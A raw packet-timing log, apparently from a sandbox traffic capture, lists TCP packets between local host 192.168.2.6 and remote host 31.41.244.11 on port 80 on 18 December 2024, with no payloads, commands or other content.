                                                                                                                                                              Dec 18, 2024 11:47:20.376693964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.376713037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.376733065 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.377549887 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.377573013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.377592087 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.377609015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.378211975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.378309011 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.379570007 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.379580975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.379592896 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.379611969 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.379643917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.380778074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.380796909 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.380808115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.380824089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.380842924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.381721020 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.381731987 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.381759882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.381778002 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.382707119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.382719040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.382759094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.384217024 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.384227991 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.384284019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.384313107 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.385283947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.385296106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.385322094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.385335922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.386976957 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.386990070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.387028933 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.387044907 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.387325048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.387378931 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.387433052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.387482882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.388509989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.388525009 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.388555050 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.388569117 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.389527082 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.389565945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.389720917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.389764071 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.390856028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.390958071 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.390990019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.391064882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.391931057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.391972065 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.392194986 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.392234087 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.393452883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.393465042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.393522978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.394922972 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.394936085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.394970894 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.394994020 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.395375967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.395415068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.395967960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.396007061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.396661997 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.396706104 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.396739006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.396800995 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.397983074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.397996902 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.398025990 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.398914099 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.398926973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.398971081 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.400062084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.400105000 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.400333881 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.400374889 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.401318073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.401350975 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.402116060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.402154922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.422508955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.422565937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.422584057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.422594070 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.422638893 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.422638893 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.422667027 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.422679901 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.422698975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.422708988 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.422712088 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.422720909 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.422745943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.422815084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.422849894 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.422878981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.422915936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.422926903 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.422944069 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.422964096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.422996044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423010111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423034906 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.423067093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.423182011 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423194885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423213005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.423227072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.423242092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423254967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423266888 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423278093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.423279047 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423290968 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423304081 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423307896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.423321009 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423327923 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.423332930 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423340082 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.423346043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423369884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.423403978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.423665047 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423676014 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423681974 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423739910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423751116 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.423752069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423763037 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423767090 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.423775911 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423787117 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.423799038 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.423825026 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.424144030 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.424202919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.550827026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.550908089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.551043987 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.551086903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.551429033 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.551482916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.551708937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.551748991 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.552562952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.552606106 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.552839994 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.552877903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.553816080 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.553855896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.554162025 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.554202080 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.555093050 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.555133104 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.555186987 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.555223942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.556170940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.556211948 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.556878090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.556920052 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.557302952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.557339907 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.557401896 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.557440042 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.558624983 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.558666945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.558701038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.558820009 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.560014963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.560074091 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.560323000 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.560364008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.560812950 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.560853958 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.560889959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.560923100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.562084913 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.562125921 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.562212944 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.562254906 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.563111067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.563150883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.564361095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.564377069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.564397097 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.564414978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.564476013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.564517975 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.565438032 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.565483093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.565660954 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.565701962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.566631079 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.566669941 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.566740990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.566776991 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.567814112 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.567856073 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.567938089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.567975998 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.569360018 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.569401026 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.569431067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.569566011 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.570127964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.570172071 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.571346045 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.571358919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.571371078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.571404934 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.571419001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.572475910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.572519064 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.572577953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.572619915 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.573684931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.573733091 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.574122906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.574166059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.574817896 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.574856043 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.576045036 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.576060057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.576095104 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.576101065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.576142073 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.577173948 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.577219009 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.577277899 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.577315092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.578352928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.578389883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.579551935 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.579565048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.579576969 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.579597950 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.579616070 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.580682039 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.580725908 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.580950022 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.580992937 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.581829071 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.581868887 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.581942081 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.582056046 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.583024979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.583067894 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.583201885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.583240032 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.584168911 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.584213972 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.584346056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.584386110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.585310936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.585345984 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.585460901 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.585498095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.586530924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.586570978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.586684942 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.586723089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.587677956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.587718964 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.587886095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.587924004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.588849068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.588891029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.588973999 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.589010000 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.590003967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.590050936 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.590111971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.590151072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.591188908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.591226101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.591262102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.591300964 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.592430115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.592513084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.592533112 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.592571974 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.593558073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.593599081 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.593692064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.593728065 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.594726086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.594767094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.595571995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.595616102 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.595875978 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.595916986 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.596594095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.596632957 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.597054958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.597096920 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.597647905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.597704887 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.598331928 CET804980631.41.244.11192.168.2.6
